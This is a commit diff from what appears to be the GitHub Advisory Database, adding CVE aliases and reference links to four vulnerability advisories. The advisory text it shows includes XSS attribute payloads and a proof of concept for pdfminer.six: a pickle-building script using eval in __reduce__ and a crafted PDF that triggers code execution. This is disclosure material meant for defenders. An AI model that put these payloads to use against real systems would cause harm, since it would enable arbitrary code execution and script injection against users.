Skip to content

Commit 16c0893

Browse files
1 parent c574c70 commit 16c0893

File tree

4 files changed

+32
-8
lines changed

4 files changed

+32
-8
lines changed

advisories/github-reviewed/2025/09/GHSA-m68q-4hqr-mc6f/GHSA-m68q-4hqr-mc6f.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-m68q-4hqr-mc6f",
4-
"modified": "2025-10-16T12:30:22Z",
4+
"modified": "2025-11-15T02:11:59Z",
55
"published": "2025-09-16T15:32:37Z",
66
"aliases": [
77
"CVE-2025-4953"
@@ -40,6 +40,10 @@
4040
"type": "ADVISORY",
4141
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4953"
4242
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/containers/podman/pull/25173"
46+
},
4347
{
4448
"type": "WEB",
4549
"url": "https://access.redhat.com/errata/RHSA-2025:16724"

advisories/github-reviewed/2025/11/GHSA-52c5-vh7f-26fx/GHSA-52c5-vh7f-26fx.json

Lines changed: 9 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-52c5-vh7f-26fx",
4-
"modified": "2025-11-06T15:44:36Z",
4+
"modified": "2025-11-15T02:10:59Z",
55
"published": "2025-11-06T15:44:35Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2025-64501"
8+
],
79
"summary": "Cross-Site Scripting (XSS) vulnerability through unescaped HTML attribute values",
810
"details": "### Impact\n\nThe prosemirror_to_html gem is vulnerable to Cross-Site Scripting (XSS) attacks through malicious HTML attribute values. While tag content is properly escaped, attribute values are not, allowing attackers to inject arbitrary JavaScript code.\n\n**Who is impacted:**\n- Any application using prosemirror_to_html to convert ProseMirror documents to HTML\n- Applications that process user-generated ProseMirror content are at highest risk\n- End users viewing the rendered HTML output could have malicious JavaScript executed in their browsers\n\n**Attack vectors include:**\n- `href` attributes with `javascript:` protocol: `<a href=\"javascript:alert(document.cookie)\">`\n- Event handlers: `<div onclick=\"maliciousCode()\">`\n- `onerror` attributes on images: `<img src=x onerror=\"alert('XSS')\">`\n- Other HTML attributes that can execute JavaScript\n\n### Patches\n\nA fix is currently in development. Users should upgrade to version **0.2.1** or later once released.\n\nThe patch escapes all HTML attribute values using `CGI.escapeHTML` to prevent injection attacks.\n\n### Workarounds\n\nUntil a patched version is available, users can implement one or more of these mitigations:\n\n1. **Sanitize output**: Pass the HTML output through a sanitization library like [Sanitize](https://github.com/rgrove/sanitize) or [Loofah](https://github.com/flavorjones/loofah):\n```ruby\n html = ProsemirrorToHtml.render(document)\n safe_html = Sanitize.fragment(html, Sanitize::Config::RELAXED)\n```\n\n2. **Implement Content Security Policy (CSP)**: Add strict CSP headers to prevent inline JavaScript execution:\n```\n Content-Security-Policy: default-src 'self'; script-src 'self'\n```\n\n3. **Input validation**: If possible, validate and sanitize ProseMirror documents before conversion to prevent malicious content from entering the system.\n\n### References\n\n- Vulnerable code: https://github.com/etaminstudio/prosemirror_to_html/blob/ea8beb32f6c37f29f042ba4155ccf18504da716e/lib/prosemirror_to_html.rb#L249\n- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)",
911
"severity": [
@@ -38,6 +40,10 @@
3840
"type": "WEB",
3941
"url": "https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx"
4042
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64501"
46+
},
4147
{
4248
"type": "WEB",
4349
"url": "https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8"
@@ -54,6 +60,6 @@
5460
"severity": "HIGH",
5561
"github_reviewed": true,
5662
"github_reviewed_at": "2025-11-06T15:44:35Z",
57-
"nvd_published_at": null
63+
"nvd_published_at": "2025-11-10T22:15:37Z"
5864
}
5965
}

advisories/github-reviewed/2025/11/GHSA-frmv-pr5f-9mcr/GHSA-frmv-pr5f-9mcr.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-frmv-pr5f-9mcr",
4-
"modified": "2025-11-05T19:55:43Z",
4+
"modified": "2025-11-15T02:10:38Z",
55
"published": "2025-11-05T15:31:07Z",
66
"aliases": [
77
"CVE-2025-64459"
@@ -106,6 +106,10 @@
106106
"type": "WEB",
107107
"url": "https://groups.google.com/g/django-announce"
108108
},
109+
{
110+
"type": "WEB",
111+
"url": "https://shivasurya.me/security/django/2025/11/07/django-sql-injection-CVE-2025-64459.html"
112+
},
109113
{
110114
"type": "WEB",
111115
"url": "https://www.djangoproject.com/weblog/2025/nov/05/security-releases"

advisories/github-reviewed/2025/11/GHSA-wf5f-4jwr-ppcp/GHSA-wf5f-4jwr-ppcp.json

Lines changed: 13 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,11 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-wf5f-4jwr-ppcp",
4-
"modified": "2025-11-07T20:52:24Z",
4+
"modified": "2025-11-15T02:12:17Z",
55
"published": "2025-11-07T20:52:24Z",
6-
"aliases": [],
6+
"aliases": [
7+
"CVE-2025-64512"
8+
],
79
"summary": "Arbitrary Code Execution in pdfminer.six via Crafted PDF Input",
810
"details": "### Summary\n\npdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.\n\n### Details\n\n```python\n# Vulnerable code in pdfminer/cmapdb.py:233-246\ndef _load_data(cls, name: str) -> Any:\n name = name.replace(\"\\0\", \"\") # Insufficient sanitization\n filename = \"%s.pickle.gz\" % name\n # ... path construction ...\n path = os.path.join(directory, filename) # If filename is an absolte path, directory is ignored\n # ...\n return type(str(name), (), pickle.loads(gzfile.read())) # Unsafe deserialization\n```\n\nAn attacker can:\n1. Create a malicious PDF with a CMap reference like `/malicious`\n2. Place a malicious pickle file at `/malicious.pickle.gz`\n3. When the PDF is processed, pdfminer loads and deserializes the malicious pickle\n4. The pickle deserialization can execute arbitrary Python code\n\n### POC\n\n#### Malicious PDF\n\nCreate a PDF with a malicious CMAP entry:\n\n```\n5 0 obj\n<<\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n>>\nendobj\n```\n\nHere the /Encoding points to `/pdfs/malicious`. Pdfminer will append the extension `.pickle.gz` to this filename. Place the PDF in a file called `/pdfs/malicious.pdf`.\n\n#### Malicious Pickle\n\nCreate a malicious, zipped pickle to execute. For example, with this Python script:\n\n```python\n#!/usr/bin/env python3\nimport pickle\nimport gzip\n\ndef create_demo_pickle():\n print(\"Creating demonstration pickle file...\")\n\n # Create payload that executes code AND returns a dict (as pdfminer expects)\n class EvilPayload:\n def __reduce__(self):\n # This function will be called during unpickling\n code = \"print('Malicious code executed.') or exit(0) or {}\"\n return (eval, (code,))\n\n demo_cmap_data = EvilPayload()\n\n # Create the pickle file that the path traversal would access\n target_path = \"./malicious.pickle.gz\"\n\n try:\n with gzip.open(target_path, 'wb') as f:\n pickle.dump(demo_cmap_data, f)\n print(f\"✓ Created demonstration pickle file: {target_path}\")\n return target_path\n\n except Exception as e:\n print(f\"✗ Error creating pickle file: {e}\")\n return None\n\nif __name__ == \"__main__\":\n create_demo_pickle()\n```\n\nThis will create a harmless, zipped pickle file that will display \"Malicious code eecuted.\" then exit when deserialized. Put the file in `/pdfs/malicious.pickle.gz`.\n\n#### Test\n\nInstall pdfminer.six and run `pdf2text.py /pdfs/malicious.pdf`. Instead of processing the PDF as normal you should see the output:\n\n```\n$ pdf2txt.py malicious.pdf\nMalicious code executed!\n```\n\n### Impact\n\nIf pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker the result is arbitrary code execution on the victim's system. An attacker could execute the Python code of their chosing with the permissions of the process running pdfminer.six.\n\nThe difficulty in achieving this depends on the OS, see below.\n\n#### Linux, MacOS - harder to exploit\n\nOn Linux-like systems only files on the filesystem can be resolved. An attacker would need to provide the malicious PDF for processing *and* the malicious pickle file would need to be present on the target system in a location that the attacker already knows, since it needs to be set in the PDF itself. In many cases this will be difficult to exploit because even if the attacker provides both the PDF and the pickle file together, there would be no way to know in advance which full path to the pickle file to specify. In many cases this would make exploitation difficult or impossible. However:\n\n* An attacker may find a way to write files to a known location on the target system or\n* The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.\n\nOverall, there is generally less risk on a Linux or Linux-like system.\n\n#### Windows - easier to exploit\n\nWindows paths can specify network locations e.g. WebDAV, SMB. This means that an attacker could host the malicious pickle remotely and specify a path to the it in the PDF. Since there is no need to get the malicious pickle file on to the target system, exploitation is easier on a Windows OS.\n\n### Appendix\n\nA complete, malicious PDF is provided here. A dockerized POC is available upon request.\n\n```\n%PDF-1.4\n1 0 obj\n<<\n/Type /Catalog\n/Pages 2 0 R\n>>\nendobj\n\n2 0 obj\n<<\n/Type /Pages\n/Kids [3 0 R]\n/Count 1\n>>\nendobj\n\n3 0 obj\n<<\n/Type /Page\n/Parent 2 0 R\n/MediaBox [0 0 612 792]\n/Contents 4 0 R\n/Resources\n<<\n/Font\n<<\n/F1 5 0 R\n>>\n>>\n>>\nendobj\n\n4 0 obj\n<<\n/Length 44\n>>\nstream\nBT\n/F1 12 Tf\n100 700 Td\n(Malicious PDF) Tj\nET\nendstream\nendobj\n\n5 0 obj\n<<\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n>>\nendobj\n\n6 0 obj\n<<\n/Type /Font\n/Subtype /CIDFontType2\n/BaseFont /MaliciousFont\n/CIDSystemInfo\n<<\n/Registry (Adobe)\n/Ordering (Identity)\n/Supplement 0\n>>\n/FontDescriptor 7 0 R\n>>\nendobj\n\n7 0 obj\n<<\n/Type /FontDescriptor\n/FontName /MaliciousFont\n/Flags 4\n/FontBBox [-1000 -1000 1000 1000]\n/ItalicAngle 0\n/Ascent 1000\n/Descent -200\n/CapHeight 800\n/StemV 80\n>>\nendobj\n\nxref\n0 8\n0000000000 65535 f\n0000000009 00000 n\n0000000058 00000 n\n0000000115 00000 n\n0000000274 00000 n\n0000000370 00000 n\n0000000503 00000 n\n0000000673 00000 n\ntrailer\n<<\n/Size 8\n/Root 1 0 R\n>>\nstartxref\n871\n%%EOF\n```",
911
"severity": [
@@ -38,13 +40,21 @@
3840
"type": "WEB",
3941
"url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp"
4042
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64512"
46+
},
4147
{
4248
"type": "WEB",
4349
"url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
4450
},
4551
{
4652
"type": "PACKAGE",
4753
"url": "https://github.com/pdfminer/pdfminer.six"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://github.com/pdfminer/pdfminer.six/releases/tag/20251107"
4858
}
4959
],
5060
"database_specific": {
@@ -54,6 +64,6 @@
5464
"severity": "HIGH",
5565
"github_reviewed": true,
5666
"github_reviewed_at": "2025-11-07T20:52:24Z",
57-
"nvd_published_at": null
67+
"nvd_published_at": "2025-11-10T22:15:40Z"
5868
}
5969
}

0 commit comments

Comments
 (0)